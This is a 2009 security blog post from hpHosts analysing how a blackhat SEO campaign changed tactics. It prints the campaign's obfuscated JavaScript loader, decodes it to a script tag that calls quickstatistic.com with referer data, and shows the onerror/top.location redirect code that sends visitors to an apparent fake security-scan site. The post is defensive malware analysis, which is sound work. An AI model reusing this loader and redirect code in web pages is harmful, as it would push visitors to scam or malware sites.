Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday, 22 July 2009

BlackHat SEO campaigns change tactics

Over the past few weeks, I've noticed a couple of interesting changes in the tactics used by those responsible for the BlackHat SEO campaigns. First and foremost, let's trackback a second, to June, which documented one of the campaigns.

The campaign documented in June, references a few characteristics that could be used to identify them, and rip them out of the index. So what's changed? Well first and foremost, the .htm files have been changed to .php files;



Second, 2.js is now only included in the file, if the HTTP REFERER server var, is the Google search string, for example;

http://vurl.mysteryfcm.co.uk/?url=740536

There's a few obvious reasons for this, the first being to prevent direct analysis. However, since the referer can be faked, there's nothing they can do to prevent us finding this. Additionally, the .js file can be accessed directly, so this doesn't really help them either.

There's also a new campaign however, that uses similar characteristics. I say similar because;

1. There's the obligatory .js file (in this case Bsrajp.js) that's only included if the referer points to Google
2. The .js file doesn't use the same method as before to obfuscate the code
3. We can no longer just load the URL the decoded script gives us, as it now requires for the SEOREF (which should point to Google) and HTTP_REFERER (which points back to the site that loaded our .js file) vars be properly populated, and point to the correct referers.

The new obfuscation is extremely poor;

Oukaoy=document; Fbhm='rrer'; var Qtoheo="U";
var Iqza=new Array();
Qtoheo+='RL'; Fbhm='refe'+Fbhm;
Iqza[12]="8";
Iqza[7]="atist";
Iqza[19]="&defau"+"lt_ke"+"yword=sex";
Iqza[5]="ttp://qu";
Iqza[13]="&seoref="+encodeURIComponent(Oukaoy[Fbhm]);
Iqza[17]="P_REFE";
Iqza[21]="scr";
Iqza[14]="¶m";
Iqza[20]="\"></";
Iqza[15]="eter=$ke";
Iqza[4]="h";
Iqza[8]="ic.com/in.";
Iqza[1]="scri";
Iqza[9]="cgi?";
Iqza[16]="yword&se=$se&ur=1&HTT";
Iqza[18]="RER="+encodeURIComponent(Oukaoy[Qtoheo]);
Iqza[10]="8&gro";
Iqza[2]="pt src";
Iqza[22]="ipt>";
Iqza[6]="ickst";
Iqza[0]="<";
Iqza[3]="=\"";
Iqza[11]="up=n16040";
for (var Xjko=0;Xjko<Iqza.length;Xjko++)
document.write(Iqza[Xjko]);


Which decodes to;

<script src="http://quickstatistic.com/in.cgi?8&group=n160408&seoref=http%3A%2F%2Fwww.google.co.uk%2Fsearch%3Fhl%3Den%26q%3D%2522ppguid.txt.html%2522%26meta%3D¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwilliamrerea82.tripod.com%2F&default_keyword=sex"></script>


This gives us;


redir = 'http://securityscanavailable.com/hitin.php?land=30&affid=17008';
function handleErrorFn() { top.location=redir; }
window.onerror = handleErrorFn;
if (top.location.href != window.location.href) {top.location =redir;
}


You can guess where this leads ....

quickstatistic.com = 74.50.98.121
securityscanavailable.com = 209.44.126.22

What these idiots don't seem to realize is, if the victim has to load the file - we can load and analyze it.

No comments: